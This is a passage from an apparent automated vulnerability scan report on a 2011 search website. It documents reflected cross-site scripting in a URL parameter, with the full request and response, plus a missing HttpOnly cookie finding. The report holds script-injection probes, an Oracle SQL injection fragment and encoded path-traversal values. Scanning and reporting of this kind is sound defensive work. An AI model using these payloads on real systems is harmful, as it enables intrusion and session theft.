href="/dp/search?qry=%2A%2Fnetsparker%280x000172%29%3B%2F%2A&qry_lnk=%2A%2Fnetsparker%280x000172%29%3B%2F%2A&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">*/netsparker(0x000172);/*</a></p><p><a href="/dp/search?qry=1%27+%7C%7C+%28select+dbms_pipe.receive_message%28%28chr%2895%29%7C%7C&qry_lnk=1%27+%7C%7C+%28select+dbms_pipe.receive_message%28%28chr%2895%29%7C%7C&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">1' || (select dbms_pipe.r...</a></p><p><a href="/dp/search?qry=xss&qry_lnk=xss&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">xss</a></p><br><div id="ms-1" class="ms"><h1>Personalize your home page with local weather, news, and more!</h1><h2>Go to <a href="http://my.starware.com?src_id='%22--></style></script><script>netsparker(0x0001B0)</script>">my.starware.com</a></h2></div></div><div id="c-2" class="c"><div id="sp-3" class="sp b"><h1>Sponsored Results for <b>Hack</b></h1><div><p class="t"><a href="http://www.google.com/aclk?sa=l&ai=C08aFfGv_TZmZJcih0AGNwP2mBeiN4IsClLSRlQrHvr0LEAEgh6aBCFDltdnZB2DJBqABj7SR_wPIAQGqBBZP0FlzdRexpvzqYvf6b6H20nd_rCMa&num=1&sig=AGiWqtw8eoZaQgWCgkSUfAXGF-Eormm00g&adurl=https://www.hackerdegree.com/inforequest/default.asp" onmouseover="window.status='http://www.<b>hack</b>erdegree.com';return true;" onmouseout="window.status='';return true;">Learn Real <b>Hacking</b> Skills</a></p><p class="s"><a href="http://www.google.com/aclk?sa=l&ai=C08aFfGv_TZmZJcih0AGNwP2mBeiN4IsClLSRlQrHvr0LEAEgh6aBCFDltdnZB2DJBqABj7SR_wPIAQGqBBZP0FlzdRexpvzqYvf6b6H20nd_rCMa&num=1&sig=AGiWqtw8eoZaQgWCgkSUfAXGF-Eormm00g&adurl=https://www.hackerdegree.com/inforequest/default.asp" onmouseover="window.status='http://www.<b>hack</b>erdegree.com';return true;" onmouseout="window.status='';return true;">Major in Network Security UAT: Masters, Bachelors, Associates</a></p><p class="h"><a href="http://www.google.com/aclk?sa=l&ai=C08aFfGv_TZmZJcih0AGNwP2mBeiN4IsClLSRlQrHvr0LEAEgh6aBCFDltdnZB2DJBqABj7SR_wPIAQGqBBZP0FlzdRexpvzqYvf6b6H20nd_rCMa&num=1&sig=AGiWqtw8eoZaQgWCgkSUfAXGF-Eormm00g&adurl=https://www.hackerdegree.com/inforequest/default.asp" onmouseover="window.status='http://www.<b>hack</b>erdegree.com';return true;" onmouseout="window.status='';return true;">www.<b>hack</b>erdegree.com</a></p></div></div><div id="al-1" class="al b"><h1>Web Search Results for <b>Hack</b></h1><h2>Results <b>1</b>-<b>10</b> of about <b>26,200,000</b></h2><div><p class="t"><a href="http://en.wikipedia.org/wiki/.hack">.<b>hack</b> - Wikipedia, the free encyclopedia</a></p><p class="s"><a>.<b>hack</b> (pronounced "dot-<b>hack</b>") is a Japanese multimedia franchise that <br> encompasses two projects; Project .<b>hack</b> and .<b>hack</b> Conglomerate. <b>...</b></a></p><p class="h"><a href="http://en.wikipedia.org/wiki/.hack">en.wikipedia.org<wbr/>/wiki<wbr/>/.hack</a></p></div><div><p class="t"><a href="http://en.wikipedia.org/wiki/Hack"><b>Hack</b> - Wikipedia, the free encyclopedia</a></p><p class="s"><a>Look up <b>Hack</b>, <b>hack</b>, <b>hacked</b>, or hacking in Wiktionary, the free dictionary <b>...</b></a></p><p class="h"><a href="http://en.wikipedia.org/wiki/Hack">en.wikipedia.org<wbr/>/wiki<wbr/>/Hack</a></p></div><div><p class="t"><a href="http://hackaday.com/"><b>Hack</b> a Day</a></p><p class="s"><a>Jun 20, 2011 <b>...</b> Fresh <b>hacks</b> every day. <b>...</b> filed under: peripherals <b>hacks</b>. [Joshua Nobel] and <br> the team at undef came up with a receipt printer game for the <b>...</b></a></p><p class="h"><a href="http://hackaday.com/">hackaday.com/</a></p></div><div><p class="t"><a href="http://www.hackthissite.org/"><b>Hack</b> This Site!</a></p><p class="s"><a>HackThisSite! is a legal and safe network security resource where users test <br> their hacking skills on various challenges and learn about hacking and network <br> <b>...</b></a></p><p class="h"><a href="http://www.hackthissite.org/">www.hackthissite.org<wbr/>/</a></p></div><div><p class="t"><a href="http://www.dothack.com/">.<b>hack</b></a></p><p class="s"><a>.<b>hack</b>. COUNTRY SELECT: EUROPEAN UNION: UNITED STATES OF AMERICA: JAPAN. ©.<b>hack</b> <br> Conglomerate.</a></p><p class="h"><a href="http://www.dothack.com/">www.dothack.com<wbr/>/</a></p></div><div><p class="t"><a href="http://www.thefreedictionary.com/hack"><b>hack</b> - definition of <b>hack</b> by the Free Online Dictionary, Thesaurus <b>...</b></a></p><p class="s"><a>To cut or chop with repeated and irr..
Parameters
Parameter
Type
Value
qry
GET
xss
qry_lnk
GET
xss
src_id
GET
></script><script>alert(9)</script>
client_id
GET
3
product
GET
unknown
serv
GET
web
subproduct
GET
site
version
GET
3
it
GET
-1
step
GET
2
start
GET
10
paid_pg
GET
3
ov_xargs
GET
3
ov_dmxargs
GET
3
Request
GET /dp/search?qry=xss&qry_lnk=xss&src_id=%3E%3C/script%3E%3Cscript%3Enetsparker(9)%3C/script%3E&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2&start=10&paid_pg=3&ov_xargs=3&ov_dmxargs=3 HTTP/1.1 Referer: http://as.starware.com/dp/search?src_id=305&client_id=&product=unknown&serv=web&version=&it=-1&step=1&subproduct=site&qry=xss User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: as.starware.com Cookie: prefs=searchHistory%3D1308594605-7-1-eHNz%2C1308594606-2-1-SGFjaw%3D%3D%2C1308594607-0--Li4lMkYuLiUyRi4uJTJGLi4lMkYuLiUyRi4uJTJGLi4lMkYuLiUyRi4uJTJGLi4lMkY%3D%2C1308594607-2-1-Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vYm9vdC5pbmkA%2C1308594608-9-1-Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vd2luZG93cy9paXM2LmxvZw%3D%3D%2C1308594610-1-1-JyItLT48L3N0eWxlPjwvc2NyaXB0PjxzY3JpcHQ%2BbmV0c3BhcmtlcigweDAwMDU1NCk%3D%2C1308594610-0--JTI3JTIyLS0lM0UlM0MlMkZzdHlsZSUzRSUzQyUyRnNjcmlwdCUzRSUzQ3NjcmlwdCU%3D%2C1308594611-6-1-eHNzACciLS0%2BPC9zdHlsZT48L3NjcmlwdD48c2NyaXB0Pm5ldHNwYXJrZXIoMHgwMDA%3D%2C1308594612-0--ZGF0YTo7YmFzZTY0LEp5SStQSE5qY21sd2RENXVaWFJ6Y0dGeWEyVnlLREI0TURBd04%3D%3B Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Mon, 20 Jun 2011 18:30:12 GMT Server: Apache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 20 Jun 2011 18:30:13 GMT Pragma: no-cache Content-Encoding: Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><base href="http://as.starware.com"></base><title>Starware xss Search Results</title><style type="text/css"> @import "http://as.starware.com/dp/content/starware/search/search.css?750"; @import "http://as.starware.com/dp/content/generic/search/pb.css?750"; </style><script language="javascript" type="text/javascript" src="http://as.starware.com/dp/content/acme/javascript/util.js?750"></script><script language="javascript" type="text/javascript" src="http://as.starware.com/dp/content/acme/javascript/Sniffer.js?750"></script><script language="javascript" type="text/javascript">var js_src_id = '></script><script>netsparker(9)</script>'; function doLoad() { // empty } function isAlreadyHP() { if (document.getElementById("ms-1")) { if (sniffer.isIE()) { if (!document.getElementById("hp").isHomePage('http://my.starware.com/?src_id=' + js_src_id)) { document.getElementById("ms-1").style.display = "block"; } } else { document.getElementById("ms-1").style.display = "block"; } } }//isAlreadyHP function trim(str) { return str.replace(/^\s*|\s*$/g,""); } function validateSearch(form) { form = document.getElementById(form); if (trim(form.qry.value)=="") return false; return true; }</script></head><body onload="ff(); isAlreadyHP()"><span xmlns="" id="hp" style="behavior:url(#default#homepage)"></span><div xmlns="" id="mh"><a href="http://my.starware.com/dp/startpage"><img src="/dp_content/starware/startpage/themes/default/img/star_search.png" blanksrc="/dp_content/starware/startpage/themes/default/img/blank.gif" pngsrc="/dp_content/starware/startpage/themes/default/img/star_search.png" width="295" height="41" alt="Starware" class="br png"></a><div class="sh" id="sh:1" style="bottom:30px"><div class="shl"><b>Shopping: </b><a target="_blank" href="http://rover.ebay.com/rover/1/711-53200-19255-0/1?campid=5335807172&toolid=10001&mpre=http%3A%2F%2Fsearch.ebay.com/xss">eBay</a> | <a href="http://www.amazon.com/exec/obidos/external-search?search-type=ss&tag=cometsearch-20&mode=blended&keyword=xss" target="_blank">Amazon</a></div></div><div class="sf" id="sf:1" style="bottom:0px"><form id="searchh" action="http://as.starware.com/dp/search" method="get" onSubmit="return validateSearch('searchh');"><input name="src_id" type="hidden" value="></script><script>netsparker(9)</script>"><input name="client_id" type="hidden" value="3"><input name="product" type="hidden" value="unknown"><input name="serv" type="hidden" value="web"><input name="version" type="hidden" value="3"><input name="it" type="hidden" value="-1"><input name="step" type="hidden" value="3"><input name="subproduct" type="hidden" value="site"><ul><li><b>Search</b></li><li><input type="text" name="qry" value="xss" class="t" maxlength="120"></li><li><input type="submit" value="Find It" class="b"></li><li><a href="/dp/search?src_id=></script><script>netsparker(9)</script>&product=prefs&bookmark=L2RwL3NlYXJjaD9xcnk9eHNzJnFyeV9sbms9eHNzJnNyY19pZD0lM0UlM0Mvc2NyaXB0JTNFJTNDc2NyaXB0JTNFbmV0c3Bhcmtlcig5KSUzQy9zY3JpcHQlM0UmY2xpZW50X2lkPTMmcHJvZHVjdD11bmtub3duJnNlcnY9d2ViJnN1YnByb2R1Y3Q9c2l0ZSZ2ZXJzaW9uPTMmaXQ9LTEmc3RlcD0yJnN0YXJ0PTEwJnBhaWRfcGc9MyZvdl94YXJncz0zJm92X2RteGFyZ3M9Mw==">Preferences</a></li></ul></form></div></div><div xmlns="" id="c-0"><div id="c-1" class="c"><div id="sp-1" class="sp b"></div><h1>Related</h1><p><a href="/dp/search?qry=Cookies&qry_lnk=Cookies&src_id=></script><script>netsparker(9)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=xss&serv=web">Cookies</a></p><p><a href="/dp/search?qry=Hack&qry_lnk=Hack&src_id=></script><script>netsparker(9)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=xss&serv=web">Hack</a></p><p><a href="/dp/search?qry=XSS+Attack&qry_lnk=XSS+Attack&src_id=></script><script>netsparker(9)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=xss&serv=web">XSS Attack</a></p><p><a href="/dp/search?qry=Cross+Site+Scripting&qry_lnk=Cross+Site+Scripting&src_id=></script><script>netsparker(9)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=xss&serv=web">Cross Site Scripting</a></p><p><a href="/dp/search?qry=SQL+Injection&qry_lnk=SQL+Injection&src_id=></script><script>netsparker(9)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=xss&serv=web">SQL Injection</a></p><p><a href="/dp/search?qry=Internet+Explorer+XSS&qry_lnk=Internet+Explorer+XSS&src_id=></script><script>netsparker(9)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=xss&serv=web">Internet Explorer XSS</a></p><p><a href="/dp/search?qry=Hack+Yahoo+ID&qry_lnk=Hack+Yahoo+ID&src_id=></script><script>netsparker(9)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=xss&serv=web">Hack Yahoo ID</a></p><p><a href="/dp/search?qry=Brown+Sugar+Cookie&qry_lnk=Brown+Sugar+Cookie&src_id=></script><script>netsparker(9)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=xss&serv=web">Brown Sugar Cookie</a></p><p><a href="/dp/search?qry=Learn+to+Hack&qry_lnk=Learn+to+Hack&src_id=></script><script>netsparker(9)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=xss&serv=web">Learn to Hack</a></p><p><a href="/dp/search?qry=IE8+XSS&qry_lnk=IE8+XSS&src_id=></script><script>netsparker(9)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=xss&serv=web">IE8 XSS</a></p><br><div id="ms-1" class="ms"><h1>Personalize your home page with local weather, news, and more!</h1><h2>Go to <a href="http://my.starware.com?src_id=></script><script>netsparker(9)</script>">my.starware.com</a></h2></div></div><div id="c-2" class="c"><div id="sp-3" class="sp b"><h1>Sponsored Results for <b>xss</b></h1><div><p class="t"><a href="http://www.google.com/aclk?sa=l&ai=CdyJStJH_TZ7OLMmh0AG91Jn6B_qHuhv2ycSSGLzb1cEBEAEgh6aBCCgGUPS_pP4EYMkGkAECoAGVioL_A8gBAaoEH0_QVRXQH7BvWypWpbPIEFJrDGWgrLsKetFOmUZkJrg&num=1&sig=AGiWqtxkAl3Nc5zc4YnsWPAFCSlaGOe3yA&adurl=http://www.infosecinstitute.com/courses/web_application_hacking_training.html%3Fas%26_kk%3Dcross%2520site%2520scripting%26_kt%3Dfce3d0fd-4e4a-4d95-a98c-770835d43a61" onmouseover="window.status='http://www.infosecinstitute.com/AppSec';return true;" onmouseout="window.status='';return true;">Web Application Hacking</a></p><p class="s"><a href="http://www.google.com/aclk?sa=l&ai=CdyJStJH_TZ7OLMmh0AG91Jn6B_qHuhv2ycSSGLzb1cEBEAEgh6aBCCgGUPS_pP4EYMkGkAECoAGVioL_A8gBAaoEH0_QVRXQH7BvWypWpbPIEFJrDGWgrLsKetFOmUZkJrg&num=1&sig=AGiWqtxkAl3Nc5zc4YnsWPAFCSlaGOe3yA&adurl=http://www.infosecinstitute.com/courses/web_application_hacking_training.html%3Fas%26_kk%3Dcross%2520site%2520scripting%26_kt%3Dfce3d0fd-4e4a-4d95-a98c-770835d43a61" onmouseover="window.status='http://www.infosecinstitute.com/AppSec';return true;" onmouseout="window.status='';return true;">Hands on web application hacking training. Secure J2EE and .NET</a></p><p class="h"><a href="http://www.google.com/aclk?sa=l&ai=CdyJStJH_TZ7OLMmh0AG91Jn6B_qHuhv2ycSSGLzb1cEBEAEgh6aBCCgGUPS_pP4EYMkGkAECoAGVioL_A8gBAaoEH0_QVRXQH7BvWypWpbPIEFJrDGWgrLsKetFOmUZkJrg&num=1&sig=AGiWqtxkAl3Nc5zc4YnsWPAFCSlaGOe3yA&adurl=http://www.infosecinstitute.com/courses/web_application_hacking_training.html%3Fas%26_kk%3Dcross%2520site%2520scripting%26_kt%3Dfce3d0fd-4e4a-4d95-a98c-770835d43a61" onmouseover="window.status='http://www.infosecinstitute.com/AppSec';return true;" onmouseout="window.status='';return true;">www.infosecinstitute.com/AppSec</a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=L&ai=CRiCatJH_TZ7OLMmh0AG91Jn6B9qirwe6h5a5CISlo70CEAIgh6aBCCgGUO_Tz0VgyQaQAQLIAQGqBBZP0FUV0B-zb1tzV54eVZ9H4sAZQ5XO&num=2&sig=AGiWqtxaCboRFz_bvDpqeM-5tnOPyUN2Ig&adurl=http://www.peterblum.com/des/inputsecurity.aspx" onmouseover="window.status='http://www.peterblum.com';return true;" onmouseout="window.status='';return true;">ASP.NET Input Security</a></p><p class="s"><a href="http://www.google.com/aclk?sa=L&ai=CRiCatJH_TZ7OLMmh0AG91Jn6B9qirwe6h5a5CISlo70CEAIgh6aBCCgGUO_Tz0VgyQaQAQLIAQGqBBZP0FUV0B-zb1tzV54eVZ9H4sAZQ5XO&num=2&sig=AGiWqtxaCboRFz_bvDpqeM-5tnOPyUN2Ig&adurl=http://www.peterblum.com/des/inputsecurity.aspx" onmouseover="window.status='http://www.peterblum.com';return true;" onmouseout="window.status='';return true;">Block SQL Injection, <b>Cross-site</b> <b>scripting</b> and other website attacks</a></p><p class="h"><a href="http://www.google.com/aclk?sa=L&ai=CRiCatJH_TZ7OLMmh0AG91Jn6B9qirwe6h5a5CISlo70CEAIgh6aBCCgGUO_Tz0VgyQaQAQLIAQGqBBZP0FUV0B-zb1tzV54eVZ9H4sAZQ5XO&num=2&sig=AGiWqtxaCboRFz_bvDpqeM-5tnOPyUN2Ig&adurl=http://www.peterblum.com/des/inputsecurity.aspx" onmouseover="window.status='http://www.peterblum.com';return true;" onmouseout="window.status='';return true;">www.peterblum.com</a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=L&ai=CXpWNtJH_TZ7OLMmh0AG91Jn6B4Tr45kCvIiNjCvyu-kXEAMgh6aBCCgGUPn3ncoFYMkGkAECyAEBqgQcT9AlY8Ufsm9bKlals8gSezcFZaCsuwp60U6ZRg&num=3&sig=AGiWqtziwSci0qgRPzkYIcJ9O73HTMwDiQ&adurl=http://www.appsecusa.org" onmouseover="window.status='http://www.appsecusa.org';return true;" onmouseout="window.status='';return true;">OWASP AppSec USA 2011</a></p><p class="s"><a href="http://www.google.com/aclk?sa=L&ai=CXpWNtJH_TZ7OLMmh0AG91Jn6B4Tr45kCvIiNjCvyu-kXEAMgh6aBCCgGUPn3ncoFYMkGkAECyAEBqgQcT9AlY8Ufsm9bKlals8gSezcFZaCsuwp60U6ZRg&num=3&sig=AGiWqtziwSci0qgRPzkYIcJ9O73HTMwDiQ&adurl=http://www.appsecusa.org" onmouseover="window.status='http://www.appsecusa.org';return true;" onmouseout="window.status='';return true;">Stop cloud & mobile data breaches. September 20-23 in Minneapolis, MN.</a></p><p class="h"><a href="http://www.google.com/aclk?sa=L&ai=CXpWNtJH_TZ7OLMmh0AG91Jn6B4Tr45kCvIiNjCvyu-kXEAMgh6aBCCgGUPn3ncoFYMkGkAECyAEBqgQcT9AlY8Ufsm9bKlals8gSezcFZaCsuwp60U6ZRg&num=3&sig=AGiWqtziwSci0qgRPzkYIcJ9O73HTMwDiQ&adurl=http://www.appsecusa.org" onmouseover="window.status='http://www.appsecusa.org';return true;" onmouseout="window.status='';return true;">www.appsecusa.org</a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=l&ai=Cbe81tJH_TZ7OLMmh0AG91Jn6B8TEq5AC7LeU3x6UmoMFEAQgh6aBCCgGUPTZ4AVgyQaQAQKgAdzUmOYDyAEBqgQcT9BVFdAftW9bYlYw50m0eb4h2TynOcqQk_FB8w&num=4&sig=AGiWqty2cMw4jk3On65Pb4bRfQjRnhczkw&adurl=http://fumfie.com/product/204.5/REBELXS1855K%2520,%2520%25202762B003%2520,%2520%2520XS4GBSDR110BN_Canon-EOS-Digital-Rebel-XS-_EOS_1000D_/" onmouseover="window.status='http://www.fumfie.com/';return true;" onmouseout="window.status='';return true;">EOS XS SLR Kit Sale @$439</a></p><p class="s"><a href="http://www.google.com/aclk?sa=l&ai=Cbe81tJH_TZ7OLMmh0AG91Jn6B8TEq5AC7LeU3x6UmoMFEAQgh6aBCCgGUPTZ4AVgyQaQAQKgAdzUmOYDyAEBqgQcT9BVFdAftW9bYlYw50m0eb4h2TynOcqQk_FB8w&num=4&sig=AGiWqty2cMw4jk3On65Pb4bRfQjRnhczkw&adurl=http://fumfie.com/product/204.5/REBELXS1855K%2520,%2520%25202762B003%2520,%2520%2520XS4GBSDR110BN_Canon-EOS-Digital-Rebel-XS-_EOS_1000D_/" onmouseover="window.status='http://www.fumfie.com/';return true;" onmouseout="window.status='';return true;">Brand New USA Fast Shipping Save BIG w/ FumFie© Order Now!</a></p><p class="h"><a href="http://www.google.com/aclk?sa=l&ai=Cbe81tJH_TZ7OLMmh0AG91Jn6B8TEq5AC7LeU3x6UmoMFEAQgh6aBCCgGUPTZ4AVgyQaQAQKgAdzUmOYDyAEBqgQcT9BVFdAftW9bYlYw50m0eb4h2TynOcqQk_FB8w&num=4&sig=AGiWqty2cMw4jk3On65Pb4bRfQjRnhczkw&adurl=http://fumfie.com/product/204.5/REBELXS1855K%2520,%2520%25202762B003%2520,%2520%2520XS4GBSDR110BN_Canon-EOS-Digital-Rebel-XS-_EOS_1000D_/" onmouseover="window.status='http://www.fumfie.com/';return true;" onmouseout="window.status='';return true;">www.fumfie.com/</a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=L&ai=CqH2StJH_TZ7OLMmh0AG91Jn6B7m3jrEC4aP4pCei15nIVxAFIIemgQgoBlDC2vK6A2DJBpABAsgBAaoEHE_QJUrrH7RvW2JWbbUcsXm-Idk8pznKkJPxQfM&num=5&sig=AGiWqtxN9I2hAPHs2YnhulfZ9BOB4Ao-HQ&adurl=http://www.ask.com/slp%3F%26q%3Dcross%2Bsite%2Bscripting%26sid%3D564baaa1-1a06-4c27-bc8b-b813c0e95243-0-us_gsb%26kwid%3D%252Bcross%2520%252Bsite%2520%252Bscripting%26cid%3D10446836633%26site%3D" onmouseover="window.status='http://www.ask.com/<b>Cross+Site+Scripting</b>';return true;" onmouseout="window.status='';return true;"><b>Cross Site Scripting</b></a></p><p class="s"><a href="http://www.google.com/aclk?sa=L&ai=CqH2StJH_TZ7OLMmh0AG91Jn6B7m3jrEC4aP4pCei15nIVxAFIIemgQgoBlDC2vK6A2DJBpABAsgBAaoEHE_QJUrrH7RvW2JWbbUcsXm-Idk8pznKkJPxQfM&num=5&sig=AGiWqtxN9I2hAPHs2YnhulfZ9BOB4Ao-HQ&adurl=http://www.ask.com/slp%3F%26q%3Dcross%2Bsite%2Bscripting%26sid%3D564baaa1-1a06-4c27-bc8b-b813c0e95243-0-us_gsb%26kwid%3D%252Bcross%2520%252Bsite%2520%252Bscripting%26cid%3D10446836633%26site%3D" onmouseover="window.status='http://www.ask.com/<b>Cross+Site+Scripting</b>';return true;" onmouseout="window.status='';return true;">Deals on <b>Cross Site Scripting</b>; Compare Prices Online & Save Big!</a></p><p class="h"><a href="http://www.google.com/aclk?sa=L&ai=CqH2StJH_TZ7OLMmh0AG91Jn6B7m3jrEC4aP4pCei15nIVxAFIIemgQgoBlDC2vK6A2DJBpABAsgBAaoEHE_QJUrrH7RvW2JWbbUcsXm-Idk8pznKkJPxQfM&num=5&sig=AGiWqtxN9I2hAPHs2YnhulfZ9BOB4Ao-HQ&adurl=http://www.ask.com/slp%3F%26q%3Dcross%2Bsite%2Bscripting%26sid%3D564baaa1-1a06-4c27-bc8b-b813c0e95243-0-us_gsb%26kwid%3D%252Bcross%2520%252Bsite%2520%252Bscripting%26cid%3D10446836633%26site%3D" onmouseover="window.status='http://www.ask.com/<b>Cross+Site+Scripting</b>';return true;" onmouseout="window.status='';return true;">www.ask.com/<b>Cross+Site+Scripting</b></a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=L&ai=CyWAutJH_TZ7OLMmh0AG91Jn6B87s4dkB7J3xwg_O6vIPEAYgh6aBCCgGUMuYxYL5_____wFgyQaQAQLIAQGqBBxP0DUN7B-3b1tiVjaQY615viHZPKc5ypCT8UHz&num=6&ggladgrp=416374914&gglcreat=4069686294&sig=AGiWqtyV-nHk5cGN1Vp-9fAMW8HJHnj3aw&adurl=http://126.xg4ken.com/media/redir.php%3Fprof%3D8%26camp%3D444%26affcode%3Dkw351934%26cid%3D4069686294%26networkType%3Dsearch%26url%5B%5D%3Dhttp%253A%252F%252Fwww.target.com%252Fgp%252Fredirect.html%252Fref%253Dtgt_adv_XS000000%253FURL%253D%252Fgp%252Fsearch%25253Ffield-keywords%25253Dxxs%252526AFID%25253Dgoogle%252526CPNG%25253Dpets%252526LNM%25253DX..
Cookie Not Marked As HttpOnly
Cookie Not Marked As HttpOnly
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..
Impact
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.
Actions to Take
See the remedy for solution
Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as
XSS Tunnel to bypass HTTPOnly protection.
External References
prefs
Request
GET /dp/search?src_id=305&client_id=&product=unknown&serv=web&version=&it=-1&step=1&subproduct=site&qry=xss HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: as.starware.com Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Mon, 20 Jun 2011 15:44:07 GMT Server: Apache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 20 Jun 2011 15:44:07 GMT Pragma: no-cache Set-Cookie: prefs=searchHistory%3D1308584647-7-1-eHNz%2C%3B; expires=Fri, 01-Jan-2038 05:00:00 GMT; path=/; domain=.starware.com Content-Encoding: Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><base href="http://as.starware.com"></base><title>Starware xss Search Results</title><style type="text/css"> @import "http://as.starware.com/dp/content/starware/search/search.css?750"; @import "http://as.starware.com/dp/content/generic/search/pb.css?750"; </style><script language="javascript" type="text/javascript" src="http://as.starware.com/dp/content/acme/javascript/util.js?750"></script><script language="javascript" type="text/javascript" src="http://as.starware.com/dp/content/acme/javascript/Sniffer.js?750"></script><script language="javascript" type="text/javascript">var js_src_id = '305'; function doLoad() { // empty } function isAlreadyHP() { if (document.getElementById("ms-1")) { if (sniffer.isIE()) { if (!document.getElementById("hp").isHomePage('http://my.starware.com/?src_id=' + js_src_id)) { document.getElementById("ms-1").style.display = "block"; } } else { document.getElementById("ms-1").style.display = "block"; } } }//isAlreadyHP function trim(str) { return str.replace(/^\s*|\s*$/g,""); } function validateSearch(form) { form = document.getElementById(form); if (trim(form.qry.value)=="") return false; return true; }</script></head><body onload="ff(); isAlreadyHP()"><span xmlns="" id="hp" style="behavior:url(#default#homepage)"></span><div xmlns="" id="mh"><a href="http://my.starware.com/dp/startpage"><img src="/dp_content/starware/startpage/themes/default/img/star_search.png" blanksrc="/dp_content/starware/startpage/themes/default/img/blank.gif" pngsrc="/dp_content/starware/startpage/themes/default/img/star_search.png" width="295" height="41" alt="Starware" class="br png"></a><div class="sh" id="sh:1" style="bottom:30px"><div class="shl"><b>Shopping: </b><a target="_blank" href="http://rover.ebay.com/rover/1/711-53200-19255-0/1?campid=5335807172&toolid=10001&mpre=http%3A%2F%2Fsearch.ebay.com/xss">eBay</a> | <a href="http://www.amazon.com/exec/obidos/external-search?search-type=ss&tag=cometsearch-20&mode=blended&keyword=xss" target="_blank">Amazon</a></div></div><div class="sf" id="sf:1" style="bottom:0px"><form id="searchh" action="http://as.starware.com/dp/search" method="get" onSubmit="return validateSearch('searchh');"><input name="src_id" type="hidden" value="305"><input name="client_id" type="hidden" value=""><input name="product" type="hidden" value="unknown"><input name="serv" type="hidden" value="web"><input name="version" type="hidden" value=""><input name="it" type="hidden" value="-1"><input name="step" type="hidden" value="2"><input name="subproduct" type="hidden" value="site"><ul><li><b>Search</b></li><li><input type="text" name="qry" value="xss" class="t" maxlength="120"></li><li><input type="submit" value="Find It" class="b"></li><li><a href="/dp/search?src_id=305&product=prefs&bookmark=L2RwL3NlYXJjaD9zcmNfaWQ9MzA1JmNsaWVudF9pZD0mcHJvZHVjdD11bmtub3duJnNlcnY9d2ViJnZlcnNpb249Jml0PS0xJnN0ZXA9MSZzdWJwcm9kdWN0PXNpdGUmcXJ5PXhzcw==">Preferences</a></li></ul></form></div></div><div xmlns="" id="c-0"><div id="c-1" class="c"><div id="sp-1" class="sp b"></div><h1>Related</h1><p><a href="/dp/search?qry=Hack&qry_lnk=Hack&src_id=305&client_id=&product=unknown&serv=web&subproduct=site&version=&it=-1&step=2&rs_prev=xss&serv=web">Hack</a></p><p><a href="/dp/search?qry=Cookies&qry_lnk=Cookies&src_id=305&client_id=&product=unknown&serv=web&subproduct=site&version=&it=-1&step=2&rs_prev=xss&serv=web">Cookies</a></p><p><a href="/dp/search?qry=XSS+Attack&qry_lnk=XSS+Attack&src_id=305&client_id=&product=unknown&serv=web&subproduct=site&version=&it=-1&step=2&rs_prev=xss&serv=web">XSS Attack</a></p><p><a href="/dp/search?qry=Cross+Site+Scripting&qry_lnk=Cross+Site+Scripting&src_id=305&client_id=&product=unknown&serv=web&subproduct=site&version=&it=-1&step=2&rs_prev=xss&serv=web">Cross Site Scripting</a></p><p><a href="/dp/search?qry=SQL+Injection&qry_lnk=SQL+Injection&src_id=305&client_id=&product=unknown&serv=web&subproduct=site&version=&it=-1&step=2&rs_prev=xss&serv=web">SQL Injection</a></p><p><a 